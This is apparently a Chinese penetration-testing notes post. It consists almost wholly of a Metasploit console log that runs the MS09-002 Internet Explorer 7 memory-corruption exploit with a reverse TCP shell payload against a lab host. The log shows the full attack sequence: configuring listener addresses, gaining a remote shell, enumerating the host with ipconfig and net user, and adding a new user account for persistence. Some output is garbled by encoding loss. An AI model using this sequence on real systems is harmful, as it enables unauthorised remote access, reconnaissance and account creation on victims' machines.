滲透雜記-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

標籤：name   padding   shell   admin   default   shel   web   version   rand   

Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 283 auxiliary + -- --=[ 210 payloads - 27 encoders - 8 nops =[ svn r9834 updated 308 days ago (2010.07.14) Warning: This copy of the Metasploit Framework was last updated 308 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating >> use windows/browser/ms09_002_memory_corruption >> set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 >> set SRVHOST 172.16.2.100 SRVHOST => 172.16.2.100 >> set LHOST 172.16.2.100 LHOST => 172.16.2.100 >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 172.16.2.100 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 172.16.2.100 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 >> exploit [*] Exploit running as background job. [*] Started reverse handler on 172.16.2.100:4444 [*] Using URL: http://172.16.2.100:8080/9wZVWxuy [*] Server started. >> back >> sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell 172.16.2.100:4444 -> 172.16.2.120:1125 >> sessions -i 1 sessions -i 1 ‘sessions‘ 2?ê??ú2??òía2??üá?￡?ò22?ê??é??DDμ?3ìDò ?ò?ú′|àí???t?￡ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> ipconfig /all ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : www-95a235b5556 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user net user \\WWW-95A235B5556 μ?ó??§?ê?§ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant SUPPORT_388945a0 ?üá?3é1|íê3é?￡ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user shentouceshiwy /add net user shentouceshiwy /add ?üá?3é1|íê3é?￡ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user net user \\WWW-95A235B5556 μ?ó??§?ê?§ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant shentouceshiwy SUPPORT_388945a0 ?üá?3é1|íê3é?￡

滲透雜記-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7